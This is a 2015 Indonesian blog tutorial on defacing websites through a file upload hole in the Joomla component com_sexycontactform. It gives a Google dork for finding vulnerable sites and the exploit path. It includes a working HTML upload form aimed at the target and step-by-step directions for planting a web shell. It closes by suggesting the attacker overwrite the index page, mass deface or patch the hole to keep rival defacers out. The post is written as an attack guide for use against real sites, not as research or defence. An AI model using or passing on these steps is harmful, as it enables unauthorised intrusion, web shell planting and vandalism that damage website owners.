Wednesday, 20 May 2015

Tutorial Deface dengan Exploit com_sexycontactform CSRF File Upload

>.< kali ini Nuenomaru akan menjelaskan dan memperaktekan Tutor simple ini.
Sebelumnya CSRF adalah singkatan dari Cross Site Request Forgery. Dengan CSRF ini, dapat memungkinkan kita untuk menanam shell pada web yang memiliki bug ini menggunakan suatu script/ SourceCode berupa php, html, dll.

Bahan:

1. PC tentunya (yg kesambung ama internet om :) )
2. script CSRF
3. Shell
4. Dork inurl: /components/com_sexycontactform/
5. Exploit: components/com_sexycontactform/fileupload/index.php


Step by Tusboled :v wkwkw

Script CSRF Com_sexycontactfrom:
<form method="POST" action="http://target.com/components/com_sexycontactform/fileupload/index.php"

enctype="multipart/form-data">


<input type="file" name="files[]" /><button>Upload</button>

</form>
1. Copy Script diatas dan save menjadi Contoh.html tipe file: all files.
*Contoh.html ganti sesuai dengan nama yang anda mau

2. Pastekan Dork Di daftar Bahan ke Kotak Pencarian google, (Bing dan yahoo juga boleh sih, kali aja lebih joss :v atau mau make scanner gitu blh juga :v )
*Linuxer alias pinguin kecil mampir ke Thread ini Dulu ;)

3. Setelah itu pilih Web TARGET anda ,dan masukan exploit diatas.
contoh: www.target.com/components/com_sexycontactform/fileupload/index.php
Bila penampakan seperti gambar dibawah, Web target anda berarti Vuln


4. Jika Vuln, pastekan/taruh url web target anda pada Script CSRF tadi.
edit dibagian http://target.com/ ubah menjadi Link Web Target anda.

5. Lalu save kembali Script CSRFnya lalu buka.

6. Klik Browse dan pilih Shell anda ~> lalu klik upload :p



7. Done :p 
xixixhi :) <- Senyum Jahat


Kalo udah ya tinggal panggil Shell agan :p
bukan dengan di SMS, Telpon :v apa lagi BBM.

Tapi ini:


Nah kalo dah masuk kaya penampakan Gambar di atas.
Seterah Sobat mo diapain, Di Tebas index ? Di titip file aja ?? di Mass deface ?? atau di patch, biar web masternya gak selingkuh ama defacer yang laen (ciyee :p, #jombloakut)

Sekian Tutorial Cupu dari Nuenomaru :p
maaf kalo ada salah2 kata, maupun kekurangan dalam Tutor kali ini.

Terimakasih Keluarga Kecil ku TKJ Cyber Art dan Mereka yang Menganggap ku sebagai Keluarga nya ^_^

./Nuenomaru


Nuenomaru just an illusion in Cyber World



Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2



EmoticonEmoticon